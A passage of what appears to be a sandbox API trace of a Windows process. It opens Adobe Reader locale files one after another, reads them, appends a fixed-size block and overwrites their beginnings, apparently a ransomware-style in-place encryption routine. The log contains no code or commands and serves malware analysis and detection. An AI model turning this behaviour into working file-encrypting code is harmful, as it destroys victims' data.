returned 1 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SUO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SUO", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.SUO", lpUsedDefaultChar=0x0) returned 10 [0075.698] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.700] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4a00 [0075.700] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.702] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4a00 [0075.702] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e958a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.702] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0075.703] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.703] CloseHandle (hObject=0x1fc) returned 1 [0075.704] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Acroform.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\acroform.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.706] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.706] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6e800 [0075.706] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.706] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.707] ReleaseMutex (hMutex=0x168) returned 1 [0075.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.FRA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.FRA", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.FRA", lpUsedDefaultChar=0x0) returned 12 [0075.707] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0075.709] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6d800 [0075.709] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.711] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6d800 [0075.712] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.712] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0075.712] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0075.712] CloseHandle (hObject=0x1fc) returned 1 [0075.713] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\EScript.fra" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\escript.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.713] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.714] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa800 [0075.714] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.714] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.714] ReleaseMutex (hMutex=0x168) returned 1 [0075.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.fra", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.fra", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.fra", lpUsedDefaultChar=0x0) returned 11 [0075.714] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.135] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9800 [0076.139] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.140] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9800 [0076.145] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.151] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.151] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.151] CloseHandle (hObject=0x1fc) returned 1 [0076.155] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\reflow.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\reflow.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.170] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1200 [0076.170] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.170] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.170] ReleaseMutex (hMutex=0x168) returned 1 [0076.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.FRA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.FRA", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.FRA", lpUsedDefaultChar=0x0) returned 10 [0076.171] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0076.173] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0076.173] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0076.173] CloseHandle (hObject=0x1fc) returned 1 [0076.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Weblink.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\weblink.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.174] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.174] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7000 [0076.175] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.175] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.175] ReleaseMutex (hMutex=0x168) returned 1 [0076.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.FRA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.FRA", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.FRA", lpUsedDefaultChar=0x0) returned 11 [0076.175] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.177] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6000 [0076.177] ReadFile (in: hFile=0x1fc, lpBuffer=0x2872fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.178] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6000 [0076.178] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.179] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.179] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.179] CloseHandle (hObject=0x1fc) returned 1 [0076.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\DVA.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\dva.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.180] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.180] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4800 [0076.180] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.180] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.181] ReleaseMutex (hMutex=0x168) returned 1 [0076.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.HRV", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0076.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.HRV", cchWideChar=7, lpMultiByteStr=0x1f7abdc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.HRV", lpUsedDefaultChar=0x0) returned 7 [0076.181] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.183] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3800 [0076.183] ReadFile (in: hFile=0x1fc, lpBuffer=0x2872fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.187] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3800 [0076.187] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.187] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.187] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.187] CloseHandle (hObject=0x1fc) returned 1 [0076.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\RdLang32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\rdlang32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.189] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.189] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x14a200 [0076.189] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.189] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.189] ReleaseMutex (hMutex=0x168) returned 1 [0076.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.HRV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.HRV", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.HRV", lpUsedDefaultChar=0x0) returned 12 [0076.189] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0076.192] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.193] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x149200 [0076.193] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.195] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x149200 [0076.195] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.195] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.195] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.196] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.196] CloseHandle (hObject=0x1fc) returned 1 [0076.196] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Spelling.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\spelling.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.197] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.197] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2800 [0076.197] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0076.197] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.197] ReleaseMutex (hMutex=0x168) returned 1 [0076.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.HRV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.HRV", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.HRV", lpUsedDefaultChar=0x0) returned 12 [0076.198] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.199] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1800 [0076.199] ReadFile (in: hFile=0x1fc, lpBuffer=0x2872fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.200] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1800 [0076.200] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.201] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0076.201] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.201] CloseHandle (hObject=0x1fc) returned 1 [0076.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Checkers.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\checkers.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 